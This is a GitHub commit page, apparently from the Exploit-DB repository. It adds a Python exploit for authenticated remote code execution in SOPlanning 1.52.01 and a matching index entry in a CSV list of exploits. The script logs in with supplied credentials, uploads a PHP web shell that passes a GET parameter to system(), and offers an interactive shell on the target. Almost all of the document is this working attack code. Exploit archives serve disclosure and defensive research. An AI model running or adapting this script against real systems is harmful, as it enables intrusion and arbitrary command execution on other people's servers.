Skip to content

Commit 773f5f4

Browse files
author
Exploit-DB
committed
DB: 2024-11-16
2 changes to exploits/shellcodes/ghdb SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
1 parent b86fb6e commit 773f5f4

File tree

2 files changed

+77
-0
lines changed

2 files changed

+77
-0
lines changed

exploits/php/webapps/52082.py

Lines changed: 76 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,76 @@
1+
# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
2+
# Date: 6th October, 2024
3+
# Exploit Author: Ardayfio Samuel Nii Aryee
4+
# Version: 1.52.01
5+
# Tested on: Ubuntu
6+
7+
import argparse
8+
import requests
9+
import random
10+
import string
11+
import urllib.parse
12+
13+
def command_shell(exploit_url):
14+
commands = input("soplaning:~$ ")
15+
encoded_command = urllib.parse.quote_plus(commands)
16+
17+
command_res = requests.get(f"{exploit_url}?cmd={encoded_command}")
18+
if command_res.status_code == 200:
19+
print(f"{command_res.text}")
20+
return
21+
print(f"Error: An erros occured while running command: {encoded_command}")
22+
23+
def exploit(username, password, url):
24+
target_url = f"{url}/process/login.php"
25+
upload_url = f"{url}/process/upload.php"
26+
link_id = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6))
27+
php_filename = f"{''.join(random.choices(string.ascii_lowercase + string.digits, k=3))}.php"
28+
29+
login_data = {"login":username,"password":password}
30+
res = requests.post(target_url, data=login_data, allow_redirects=False)
31+
32+
cookies = res.cookies
33+
34+
multipart_form_data = {
35+
"linkid": link_id,
36+
"periodeid": 0,
37+
"fichiers": php_filename,
38+
"type": "upload"
39+
}
40+
41+
web_shell = "<?php system($_GET['cmd']); ?>"
42+
43+
files = {
44+
'fichier-0': (php_filename, web_shell, 'application/x-php')
45+
}
46+
upload_res = requests.post(upload_url, cookies=cookies,files=files, data=multipart_form_data)
47+
48+
if upload_res.status_code == 200 and "File" in upload_res.text:
49+
print(f"[+] Uploaded ===> {upload_res.text}")
50+
print("[+] Exploit completed.")
51+
exploit_url = f"{url}/upload/files/{link_id}/{php_filename}"
52+
print(f"Access webshell here: {exploit_url}?cmd=<command>")
53+
54+
if "yes" == input("Do you want an interactive shell? (yes/no) "):
55+
try:
56+
while True:
57+
command_shell(exploit_url)
58+
except Exception as e:
59+
raise(f"Error: {e}")
60+
else:
61+
pass
62+
63+
64+
def main():
65+
parser = argparse.ArgumentParser(prog="SOplanning RCE", \
66+
usage=f"python3 {__file__.split('/')[-1]} -t http://example.com:9090 -u admin -p admin")
67+
68+
parser.add_argument("-t", "--target", type=str, help="Target URL (e.g., http://localhost:8080)", required=True)
69+
parser.add_argument("-u", "--username",type=str,help="username", required=True)
70+
parser.add_argument("-p", "--password",type=str,help="password", required=True)
71+
72+
args = parser.parse_args()
73+
74+
exploit(args.username, args.password, args.target)
75+
76+
main()

files_exploits.csv

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -30275,6 +30275,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3027530275
48074,exploits/php/webapps/48074.txt,"SOPlanning 1.45 - 'by' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,http://www.exploit-db.comsoplanning-1-45.zip,
3027630276
48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,,
3027730277
48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,,
30278+
52082,exploits/php/webapps/52082.py,"SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)",2024-11-15,cybersploit,webapps,php,,2024-11-15,2024-11-15,0,,,,,,
3027830279
38478,exploits/php/webapps/38478.txt,"Sosci Survey - Multiple Vulnerabilities",2013-04-17,"T. Lazauninkas",webapps,php,,2013-04-17,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/59278/info
3027930280
4282,exploits/php/webapps/4282.txt,"SOTEeSKLEP 3.5RC9 - 'file' Remote File Disclosure",2007-08-13,dun,webapps,php,,2007-08-12,,1,OSVDB-38454;CVE-2007-4369,,,,,
3028030281
41558,exploits/php/webapps/41558.txt,"Soundify 1.1 - 'tid' SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,

0 commit comments

Comments
 (0)